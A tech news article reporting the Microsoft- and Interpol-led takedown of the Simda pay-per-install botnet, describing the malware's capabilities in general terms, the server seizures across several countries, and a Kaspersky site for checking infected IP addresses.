Backdoor bot brains snatched after cops, white hats raid servers

Password-stealing, malware-spreading Simda nasty found on 770,000 PCs


Microsoft and Interpol have teamed up to derail a malware infection that compromised more than 770,000 Windows PCs worldwide.

Simda is a “pay-per-install” software nasty: fraudsters pay miscreants some sum of money for every 1,000 or so machines they compromise. The hackers effectively earn cash by selling access to the infected computers, renting out the botnet real-estate to other crooks.

The Simda malware, once installed and has set itself up to run after every system startup, kills off antivirus software, logs keystrokes made by the user so it can steal passwords and other sensitive information, downloads and executes banking Trojans and other malicious programs, upload copies of the user's files, and so on.

It opens a backdoor to a command-and-control server, so it can receive orders from the brains behind the malware, and send back any stolen data.

The botnet was seeded by compromising legitimate websites, and hijacking them to redirect visitors to sites hosting exploit kits – which are webpages booby-trapped with code that exploits software vulnerabilities to install the malware.

The most heavily infected countries were the US, UK, Russia, Canada and Turkey, although Simda spreads its tentacles worldwide. The vast majority of victims were located in the US, where there were more than 90,000 new infections since the start of 2015 alone.

In a series of raids last Thursday, 10 command-and-control servers were physically seized in the Netherlands, with additional servers taken down in the US, Russia, Luxembourg and Poland. The operation involved officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI in the US, and the Russian Ministry of the Interior’s Cybercrime Department “K” supported by the INTERPOL National Central Bureau in Moscow.

Security firms Trend Micro and Kaspersky Lab provided the cops the technical knowhow to locate the systems. The crackdown effectively decapitated the botnet by taking away the servers that sent infected PCs their instructions and received swiped passwords and other data.

Windows PCs keelhauled into the botnet remain compromised, hence the need for a cleanup operation. In order to help victims disinfect their PCs, Kaspersky Lab has created a website that will check your public IP address against a database of machines known to be infiltrated by Simda. This database was lifted from the command and control servers during the takedown raids.

if you're after more technical information, Kaspersky Lab has a writeup here, and Trend Micro over here.

The Simda botnet takedown follows hot on the heels of similar operations against the Beebone botnet, which also took place last week. ®


Tech Resources

Apps are Essential, so your WAF must be effective

You can’t run a business today without applications—and because apps are critical to strategic business imperatives and commerce, they have become the prime target for attackers.

Webcast Slide Deck | How backup modernization changes the ransomware game

If the thrill of backing up your data and wondering if you will ever see it again has worn off, start the new year by getting rid of the lingering pain of legacy backup. Bipul Sinha, CEO of the Cloud Data Management Company, Rubrik, and Miguel Zatarain, Director of Global Infrastructure Technology at PACCAR, Fortune 500 manufacturer of trucks and Rubrik customer, are talking to the Reg’s Tim Phillips about how to eliminate the costly, slow and spotty performance of legacy backup, and how to modernize your implementation in 2021 to make your business more resilient.

Three reasons you need a hybrid multicloud

Businesses need their IT teams to operate applications and data in a hybrid environment spanning on-premises private and public clouds. But this poses many challenges, such as managing complex networking, re-architecting applications for the cloud, and managing multiple infrastructure silos. There is a pressing need for a single platform that addresses these challenges - a hybrid multicloud built for the digital innovation era. Just this Regcast to find out: Why hybrid multicloud is the ideal path to accelerate cloud migration.

Top 20 Private Cloud Questions Answered

Download this asset for straight answers to your top private cloud questions.

Biting the hand that feeds IT © 1998–2021